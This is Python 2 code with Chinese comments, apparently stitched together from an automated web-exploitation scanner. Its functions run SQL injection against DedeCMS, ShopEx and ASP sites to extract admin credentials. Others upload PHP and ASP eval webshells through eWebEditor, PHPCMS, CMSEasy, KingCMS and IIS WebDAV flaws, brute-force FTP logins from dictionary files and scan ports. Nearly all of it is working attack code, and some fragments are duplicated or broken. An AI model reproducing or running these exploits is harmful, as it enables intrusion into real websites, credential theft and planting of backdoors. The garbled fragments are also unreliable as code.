def three(self,arg,path): try: site = path+'/plus/long.php' testsite = path+'/plus/shaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhaoshaoxhaoxhaoxhao.php' httpres = self.request(arg,site) code = None testcode = None testhttpres = self.request(arg,testsite) if testhttpres: testcode = testhttpres.status #返回值 if httpres: code = httpres.status #返回值 if code != testcode: #不相等为有效 #print u' \nGood,write OK ! Shell :%s%s pass:long' % (arg,site) if yijuhua_cs("php",arg+site,"long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list=[1,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list,0.5) #插入队列 else: #否 EXP_list=[0,self.url0,self.url1,"CN_exp_dedecms_getshell",arg.strip()+site,"long","webshell"] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list,0.5) #插入队列 # print "exp_dedecms_getshell---%s---%s"%(arg.strip()+site,"webshell--pass:guige") else: #print u' \n亲,你点真背,不存在漏洞!' return 0 return 0 except Exception,e: #print e return 0
def one(self, arg): try: url = arg + '/?product-gnotify' #定义要提交的数据 html = '1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators limit 0,1' data = {"goods[goods_id]": '3', "goods[product_id]": html} h = httplib2.Http('.cache') response, content = h.request( url, 'POST', urlencode(data), headers={'Content-Type': 'application/x-www-form-urlencoded'}) gre = re.compile(r'\$\^(.+)?\^\$') s = content lpwd = gre.findall(s) if len(lpwd) == 1: #pwd=lpwd[0] #print url+"\n"+pwd+"\n+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n" EXP_list = [ 1, self.url, "bc", "CN_bc_shopex_4_8_5", url, lpwd[0], "", "" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 else: pass return 1 except Exception, e: #print e return 0
def scan(self,URL): try: tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\\'`+]=a" ss=self.open_url_data(tj_data1) if ss==0: #读取网页内容 return 0 pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key') sarr = pname.findall(ss) if sarr: #print sarr[0] EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php1",URL+"/plus/search.php",sarr[0],""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型"," url_exp.put(EXP_list,0.5) #插入队列 tj_data1=URL+"/plus/search.php?keyword=as&typeArr[111%3D@`\\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\\'`+]=a" ss=self.open_url_data(tj_data1) if ss==0: #读取网页内容 return 0 pname = re.compile( r'Error infos: Duplicate entry \'(.*?)\' for key' ) sarr = pname.findall(ss) if sarr: #print sarr[0] EXP_list=[1,self.url,"bc","CN_bc_dedecms_search_php2",URL+"/plus/search.php",sarr[0],""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型"," url_exp.put(EXP_list,0.5) #插入队列 except: pass
def find(self, arg): site = '/plus/dst.php' heareds = { "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" } conn = httplib.HTTPConnection(arg) try: conn.request('GET', site, None, heareds) httpres = conn.getresponse() if httpres.status == 200: data = 'http://%s/plus/dst.php' % arg print data if yijuhua_cs("php", data, "cmd"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, self.url0, self.url1, "CN_exp_dedecms_yijuhua", data, "cmd", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, self.url0, self.url1, "CN_exp_dedecms_yijuhua", data, "cmd", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 # print "exp_dedecms_yijuhua---%s---%s"%(data,"webshell--pass:cmd") except Exception, e: #print e return False
def one(self, arg): try: url = arg + "/uploads/plus/search.php?keyword=11&typeArr[%60@%27%60and%28SELECT%201%20FROM%28select%20count%28*%29,concat%28floor%28rand%280%29*2%29,%28SELECT/*%27*/concat%280x5f,userid,0x5f,pwd,0x5f%29%20from%20dede_admin%20Limit%200,1%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29]=1" req = urllib2.Request(url) res = urllib2.urlopen(req) html = res.read() res.close() #print html html = re.findall(r"Duplicate entry \'\w+'", html) if html: #print "OK-----------------success" #print html[0] EXP_list = [ 1, self.url0, self.url1, "CN_sql_dede_57_sp1X1", html[0], "", "" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 return 1 else: #print "no sql injection" return 0 except Exception, e: #print e return 0
def ewebeditor_asp(self, arg): # try: url = arg + "/jms/edit/Upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" files = {'uploadfile': open("long.asp.cer", "rb")} r = requests.post(url, files=files) data = r.text #print data p = re.compile(r"parent.UploadSaved\('(.*?)'\)") sarr = p.findall(data) #找出一条 name = sarr[0] #print name url = "%s/jms/edit/uploadfile/%s" % (arg, name) if yijuhua_cs("asp", url, "long"): #ASP还是PHP ,URL地址 ,密码 #print url+"OK" EXP_list = [ 1, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp", url, "long", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 else: #print url+"NO" EXP_list = [ 0, self.url0, self.url1, "CN_exp_ewebeditor_Upload_asp", url, "long", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 except Exception, e: #print e return 0
def getshell(self,arg): try: headers = {'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'} #data = "test<?php @eval($_POST[\''.'shaoxiao'.'\']);?>'" data="<?php @eval($_POST['long']);?>" url = arg.split('//')[1] site = '/index.php?m=attachment&c=attachments&a=crop_upload&width=6&height=6&file='+self.url1+'/uploadfile/1222.thumb_.Php.JPG%20%20%20%20%20%20%20Php' conn = httplib.HTTPConnection(url) conn.request('POST',site,data,headers) httpres = conn.getresponse() html = httpres.read() #print html if httpres.status == 200 and html: gets = re.compile('http://(.*?)\.Php\.JPG\s') get = gets.findall(html) if get: data='http://'+get[0]+'.Php.JPG%20%20%20%20%20%20%20Php' #Pass:long if yijuhua_cs("php",data,"long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list=[1,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list,0.5) #插入队列 else: #否 EXP_list=[0,self.url0,self.url1,"CN_exp_phpcmsv9_getshell",data,"long","webshell"] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list,0.5) #插入队列 #print "exp_phpcmsv9_getshell---%s---%s"%(data,"webshell--pass:long") return 1 except Exception,e: #print e return 0
def scan(self, arg): url0, url1 = arg url = url1.split('//')[1] if not self.getcss(url1): css = 'index.html' + '%00.php' else: css = self.getcss(url1) + '%00.php' site = '''/plus/carbuyaction.php?dopost=return&code=../../%s''' % css headers = { "User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)", "cookie": "code=alipay" } conn = httplib.HTTPConnection(url) try: conn.request('GET', site, None, headers) httpres = conn.getresponse() html = httpres.read() if (httpres.status == 200) and (len(html) > 0) and html[:6] != '<html>': url = "%s%s" % (url1, site) EXP_list = [1, url0, url1, "CN_bc_DedeCms_5x", url, "", ""] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 except: pass
def scan(self, arg): url = arg+'/search.php?query=shaoxiao%27%3B%3F%3E%3C%3F%66%70%75%74%73%28%66%6F%70%65%6E%28%27%53' \ '%74%79%6C%65%2E%70%68%70%27%2C%27%77%27%29%2C%62%61%73%65%36%34%5F%64%65%63%6F%64%65%28%' \ '27%4D%54%45%78%50%44%39%77%61%48%41%67%51%47%56%32%59%57%77%6F%4A%46%39%51%54%31%4E%55%57' \ '%79%64%6A%62%57%51%6E%58%53%6B%37%50%7A%34%79%4D%6A%49%3D%27%29%29%3B%3F%3E%26%6D%6F%64%65%' \ '6C%69%64%3D%31%20%6F%72%20%32%3D%32' #UrlDecode解码 shellurl = arg + '/Style.php' try: html = urllib2.urlopen(url).read() #print html if 'shaoxiao' in html: shellhtml = urllib2.urlopen(shellurl).read() if '111222' in shellhtml: if yijuhua_cs("php", shellurl, "cmd"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, self.url, "exp", "CN_exp_kingcms_getshell", shellurl, "cmd", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, self.url, "exp", "CN_exp_kingcms_getshell", shellurl, "cmd", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 #print "exp_kingcms_getshell---%s---%s"%(shellurl,"webshell--pass:cmd") except Exception, e: #print e return 0
def scan(self, arg): try: opener = urllib2.build_opener(UPLOAD.MultipartPostHandler) params = {"fileToUpload": open("long.php;.jpg", "rb")} url = arg + '/celive/live/doajaxfileupload.php' req = opener.open(url, params) html = req.read() murl = re.compile("<a href='(.*?)'") ok = murl.findall(html) print ok if ok and '.php;.jpg' in ok[0]: if yijuhua_cs("php", ok[0], "long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0], "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, self.url, "exp", "CN_exp_etcms_Upload_shell", ok[0], "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 # print "exp_kingcms_getshell---%s---%s"%(ok[0],"webshell--pass:long") except Exception, e: print e pass
def rfid_list(self): #读取数组 try: for i in self.list_http: #print i EXP_list=[1,self.penurl,"http_200","http_200",i,"","http+200"] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list,0.5) #插入队列 except Exception,e: print e return 0
def run(self): MAX_RETRIES = 5 retry = 0 account = None #None=NULL 数组 while self.running and accounts: #list数组 try: self.ftp.connect(Adomain, port) #连接 服务器名 端口号 except Exception, e: if retry <= MAX_RETRIES: #这是为了控制线程吗 retry = retry + 1 #没必要使用这个变量啊 continue #跳过 else: self.running = False #这是 控制线程 break #跳出 #print ".", #重新每三次 为什么一个账户要连接3次 呢 loop_num = 0 while loop_num < 3: loop_num = loop_num + 1 if not account and accounts: #list数组 account = accounts.pop() #list数组 输出 #绝对不要尝试 if not account: #数组无数据了就跳出 break #跳出 #print u'IP:',host,u'用户名:',account[0],u'密码:',account[1] try: self.ftp.login(account[0], account[1]) #连接FTP #没有异常发生,这是一个正确的帐号 # u_data="-CS_linkftp-FTP OK-IP:%s user:%s password:%s time:%s"%\ # (host,account[0],account[1],time.strftime('%Y.%m.%d-%H.%M.%S')) # print u_data EXP_list = [ 1, host, "FTP", "user:"******"", "password:"******"", "", "" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 time.sleep(0.1) account = None #None=NULL self.sql. except Exception, e: emsg = str(e) #调试信息 if 'connection' in emsg.lower( ) or 'tries' in emsg.lower( ): #判断 连接 失败错误信息 不明白何意 retry = retry + 1 break #跳出 else: #reset retry account = None #None=NULL retry = 0
def scan(url,ip,port): try: s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) #s.connect((ip,port)) result=s.connect_ex((ip,port)) if(result==0): print 'url:%s IP:%s:%d open'%(url,ip,port) EXP_list=[1,url,"url:port","socket_port",str(port)+" open","",""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list,0.5) #插入队列 s.close() except: return 0
def rfid_list(self): #读取数组 try: for i in self.list_http: #print i EXP_list = [ 1, self.penurl[0], self.penurl[1], "http_200", i, "", "" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 except Exception, e: print e return 0
def rfid_list(self): #读取数组 try: for i in self.list_download: #print i # EXP_list=[1,self.penurl,"http_download","http_download",i,"","http+download"] # #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 # url_exp.put(EXP_list,0.5) #插入队列 EXP_list=[1,self.penurl[0],self.penurl[1],"http_download",i,"",""] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list,0.5) #插入队列 except Exception,e: print e return 0
def one2(self,arg): try: html = urllib2.urlopen(arg+'/plus/search.php?keyword=as&typeArr%5B1%20%75%4E%69%6F%6E%201%5D=a',timeout=5).read() if html: r = r"<font size='5' color='red'>(.*?)</font>" m = re.findall(r,html) if m: #print 'search_php Sqlinjection'+m[0] EXP_list=[1,self.url,"sql","CN_sql_dede_57_sp1X2",m[0],"",""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list,0.5) #插入队列 return 0 except Exception,e: #print e return 0
def for_list(self): try: for i in self.list: #print i if self.open_url_cms(self.URL,i[0],i[1]): #url 地址 版本 #print u"网址:%s 链接:%s 关键字:%s 版本:%s"%(self.URL,i[0],i[1],i[1]) #list=[self.URL,i[1]] #print list EXP_list=[1,self.url0,self.URL,"cms",i[1],"",""] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list,0.5) #插入队列 break #跳出整个循环 except Exception,e: #print e return 0
class CS_linkftp(threading.Thread): def __init__(self, openurl): threading.Thread.__init__(self) self.Internet = 10 #控制到300次检测一次网络状态 self.openftp = openurl[7:] #self.Chost="" #主机地址 self.ftp_login(self.openftp) WEAK_USERNAME = [ p.replace('\n', '') for p in open('username.dic').readlines() ] WEAK_PASSWORD = [ p.replace('\n', '') for p in open('password.dic').readlines() ] def get_sdomain(self, domain): #域名拆解www.baidu.com->baidu.com suffixes = 'ac', 'ad', 'ae', 'aero', 'af', 'ag', 'ai', 'al', 'am', 'an', 'ao', 'aq', 'ar', 'arpa', 'as', 'asia', 'at', 'au', 'aw', 'ax', 'az', 'ba', 'bb', 'bd', 'be', 'bf', 'bg', 'bh', 'bi', 'biz', 'bj', 'bm', 'bn', 'bo', 'br', 'bs', 'bt', 'bv', 'bw', 'by', 'bz', 'ca', 'cat', 'cc', 'cd', 'cf', 'cg', 'ch', 'ci', 'ck', 'cl', 'cm', 'cn', 'co', 'com', 'coop', 'cr', 'cu', 'cv', 'cx', 'cy', 'cz', 'de', 'dj', 'dk', 'dm', 'do', 'dz', 'ec', 'edu', 'ee', 'eg', 'er', 'es', 'et', 'eu', 'fi', 'fj', 'fk', 'fm', 'fo', 'fr', 'ga', 'gb', 'gd', 'ge', 'gf', 'gg', 'gh', 'gi', 'gl', 'gm', 'gn', 'gov', 'gp', 'gq', 'gr', 'gs', 'gt', 'gu', 'gw', 'gy', 'hk', 'hm', 'hn', 'hr', 'ht', 'hu', 'id', 'ie', 'il', 'im', 'in', 'info', 'int', 'io', 'iq', 'ir', 'is', 'it', 'je', 'jm', 'jo', 'jobs', 'jp', 'ke', 'kg', 'kh', 'ki', 'km', 'kn', 'kp', 'kr', 'kw', 'ky', 'kz', 'la', 'lb', 'lc', 'li', 'lk', 'lr', 'ls', 'lt', 'lu', 'lv', 'ly', 'ma', 'mc', 'md', 'me', 'mg', 'mh', 'mil', 'mk', 'ml', 'mm', 'mn', 'mo', 'mobi', 'mp', 'mq', 'mr', 'ms', 'mt', 'mu', 'mv', 'mw', 'mx', 'my', 'mz', 'na', 'name', 'nc', 'ne', 'net', 'nf', 'ng', 'ni', 'nl', 'no', 'np', 'nr', 'nu', 'nz', 'om', 'org', 'pa', 'pe', 'pf', 'pg', 'ph', 'pk', 'pl', 'pm', 'pn', 'pr', 'pro', 'ps', 'pt', 'pw', 'py', 'qa', 're', 'ro', 'rs', 'ru', 'rw', 'sa', 'sb', 'sc', 'sd', 'se', 'sg', 'sh', 'si', 'sj', 'sk', 'sl', 'sm', 'sn', 'so', 'sr', 'st', 'su', 'sv', 'sy', 'sz', 'tc', 'td', 'tel', 'tf', 'tg', 'th', 'tj', 'tk', 'tl', 'tm', 'tn', 'to', 'tp', 'tr', 'tt', 'tv', 'tw', 'tz', 'ua', 'ug', 'uk', 'us', 'uy', 'uz', 'va', 'vc', 've', 'vg', 'vi', 'vn', 'vu', 'wf', 'ws', 'xn', 'ye', 'yt', 'za', 'zm', 'zw' sdomain = [] bdomain = False for section in domain.split('.'): if section in suffixes: sdomain.append(section) bdomain = True else: sdomain = [section] return '.'.join(sdomain) if bdomain else '' def get_ssdomain(self, domain): #域名拆解www.baidu.com->baidu sdomain = self.get_sdomain(domain) #先解析一道 ssdomian = sdomain.partition('.')[0] if sdomain else '' return ssdomian def ftp_login(self, host, nthreads=10, port=21): #传入名域名开始扫描 #尝试登录 if success return username & password #print u"要扫描IP:",host, #self.A= int(time.strftime('%H%M%S')) try: #是否能链接上FTP ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 except Exception, e: print e return 0 try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户 ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 ftpA.login("anonymous", "") #连接FTP EXP_list = [ 1, host, "FTP", "user:anonymous", "password:"******"", "niming" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 return 0 except Exception, e: pass
def socket_80(self, url): try: port = 80 ip = socket.gethostbyname(url) #www.51jmyj.com data = "OPTIONS / HTTP/1.1\nHost:%s\r\n\r\n" % ( ip) #OPTIONS返回服务器的各种信息 OPTIONS = self.socket_sendall(ip, port, data) p = re.compile( r'(Server:.*?)(\n)') #(Server):(.*?)(?:\n) (Server:.*?)(\n) sarr = p.findall(OPTIONS) data = sarr[0][0] if data == "": return 0 EXP_list = [1, url, "socket_port80", "socket_port80", data, "", ""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 print "url:%s port80:%s" % (url, data) except: return 0
def one(self, arg): try: URL = arg + "/NewsType.asp?SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='" ss = self.open_url_data(URL) if ss == 0: #读取网页内容 return 0 p = re.compile(r'<a.+?href=\\"shownews.asp.+?>(.+?)</a></span>') sarr = p.findall(ss) if "|" in sarr[0]: EXP_list = [ 1, self.url, "bc", "CN_bc_nfsj_jlxt_wrtx", arg + "/NewsType.asp", sarr[0], "" ] print EXP_list #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 except Exception, e: #print e return 0
def IIS_webdav(self, url, port=80): #iis 写入漏洞 IIS webdav try: self.txt = '/test.txt' s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote_ip = socket.gethostbyname(url) s.connect((remote_ip, port)) message = "OPTIONS / HTTP/1.1\r\nHost: %s\r\n\r\n" % url s.sendall(message) reply = s.recv(1024) if 'DAV' in reply: #print 'Webdav Is Vulnerable! Try To Hacking....' if self.put(url, self.txt): data = "http://%s/%s" % (url, self.txt) #print "exp_IISwebdav_put---%s---%s"%(data,"webshell--pass:long") EXP_list = [ 1, url, "exp", "exp_IISwebdav_put", data, "", "" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 MOVE_asp = self.sjzf() #随机文件名 MOVE_asp += ".asp;jpg" moveheaders = { 'User-Agent': 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)', 'Destination': 'http://%s/%s' % (url.strip(), MOVE_asp) } if self.move(url, self.txt, moveheaders): data = "http://%s/%s" % (url.strip(), MOVE_asp) if yijuhua_cs("asp", data, "long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, url, "exp", "exp_IISwebdav_move", data, "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 #print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, url, "exp", "UAS_exp_IISwebdav_move", data, "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 #print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 # print "exp_IISwebdav_move---%s---%s"%(data,"webshell--pass:long") #else: # print 'Webdav Is No Vulnerable!' return 0 except Exception, e: #print e return 0
def scan(self, arg): try: url0, url1 = arg #http://www.skyscom.com/celive/live/doajaxfileupload.php data = "%s/celive/live/doajaxfileupload.php" % (url1) if 'jpg' in self.URL_DZ(data): #检查是否支持JPG EXP_list = [ 1, url0, url1, "CN_exp_cmseasy_IIS6_jx_JPG", data, "", "" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 #上传文件 #data="<?php @eval($_POST['long']);?>" #一句话 files = {'fileToUpload': open('long.php;.jpg', 'rb')} r = requests.post(data, files=files) data = r.text name = [] try: p = re.compile(r'target=.+?>(.*?)</a>' ) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg'] sarr = p.findall(data) #找出一条 name = sarr[0] except: #print "!" return 0 #print name data = "%s/celive/uploadfiles/%s" % (url1, name) if self.http_get( url1.split('//')[1], "/celive/uploadfiles/" + name): #验证地址是否存在 if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, url0, url1, "CN_exp_cmseasy_IIS6_jx", data, "long", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, url0, url1, "CN_exp_cmseasy_IIS6_jx", data, "long", "webshell" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 #print EXP_list url_exp.put(EXP_list, 0.5) #插入队列 except Exception, e: #print e return 0
def cmseasy_IIS6_jx(self, url): #cmseasy文件上传+IIS6解释漏洞 try: #http://www.skyscom.com/celive/live/doajaxfileupload.php data = "%s/celive/live/doajaxfileupload.php" % (url) if 'jpg' in self.URL_DZ(data): #检查是否支持JPG #print "-cms-cmseasy_IIS6_jx-open jpg %s"%(data) EXP_list = [0, url, "exp", "exp_cmseasy_IIS6_jx", data, "", ""] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 #上传文件 #data="<?php @eval($_POST['long']);?>" #一句话 files = {'fileToUpload': open('long.php;.jpg', 'rb')} r = requests.post(data, files=files) data = r.text name = [] try: p = re.compile(r'target=.+?>(.*?)</a>' ) #结果 [u'CELIVE-Q7duV0tNj8.php;.jpg'] sarr = p.findall(data) #找出一条 name = sarr[0] except: #print "!" return 0 #print name data = "%s/celive/uploadfiles/%s" % (url, name) if self.http_get(url[7:], "/celive/uploadfiles/" + name): #验证地址是否存在 if yijuhua_cs("php", data, "long"): #ASP还是PHP ,URL地址 ,密码 #是 EXP_list = [ 1, url, "exp", "CN_exp_cmseasy_IIS6_jx", data, "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 else: #否 EXP_list = [ 0, url, "exp", "CN_exp_cmseasy_IIS6_jx", data, "long", "webshell" ] #["一句话 是否成功0否 1是","网址","严重程度","漏洞类型","漏洞地址","密码","备注"]7个 url_exp.put(EXP_list, 0.5) #插入队列 except Exception, e: #print e return 0
ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 except Exception, e: print e return 0 try: #判断是否为匿名账户 #anonymous 密码为空属于匿名账户 ftpA = FTP() #初始化FTP类 ftpA.connect(host, port) #连接 服务器名 端口号 ftpA.login("anonymous", "") #连接FTP EXP_list = [ 1, self.openurl[0], host, "FTP", "user:anonymous:password:"******"", "niming" ] #["01可信度","主网址","从网址","漏洞类型","漏洞地址","密码","备注"] 7个 url_exp.put(EXP_list, 0.5) #插入队列 return 0 except Exception, e: pass #print u"要扫描IP:",host, Adomain = host #域名www.baidu.com Bdomain = self.get_sdomain(Adomain) #域名拆解www.baidu.com->baidu.com Cdomain = self.get_ssdomain(Adomain) #域名拆解www.baidu.com->baidu Ddomain = "" #域名拆解www.baidu.com->wwwbaiducom for i, j in {'.': ''}.iteritems(): #去.符号 Ddomain = Adomain.replace(i, j) ################################### accounts = deque() #list数组 #准备 用户名和密码